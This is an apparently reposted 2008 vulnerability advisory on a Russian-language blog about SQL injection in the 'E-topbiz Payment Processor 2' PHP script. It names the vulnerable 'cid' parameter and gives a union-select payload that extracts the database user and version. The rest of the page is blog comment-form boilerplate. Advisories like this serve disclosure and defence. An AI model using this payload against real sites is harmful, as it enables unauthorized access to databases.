E-topbiz Payment Processor 2 SQL-INJECTION

Application: E-topbiz Payment Processor 2

Version: 2.0

Website: http://e-topbiz.com/oprema/pages/pproc2.php

Demo: http://e-topbiz.com/trafficdemos/payment2/

About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

Date: 01-08-2008

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())

Like this:

Будьте первым, кому понравился этот .

Запись опубликована в 24.09.2008 , 3:37 пп и размещена в рубрике Advisory. Вы можете следить за обсуждением этой записи с помощью ленты RSS 2.0. Вы можете оставить отзыв или обратную ссылку с вашего сайта.

Добавить комментарий Отменить ответ

Введите свой комментарий...

Fill in your details below or click an icon to log in:

E-mail (обязательно) (Не опубликовано)

Имя (обязательно)

Сайт

You are commenting using your WordPress.com account. ( Log Out / Изменить )

You are commenting using your Twitter account. ( Log Out / Изменить )

You are commenting using your Facebook account. ( Log Out / Изменить )

Отмена

Connecting to %s

Crw hp…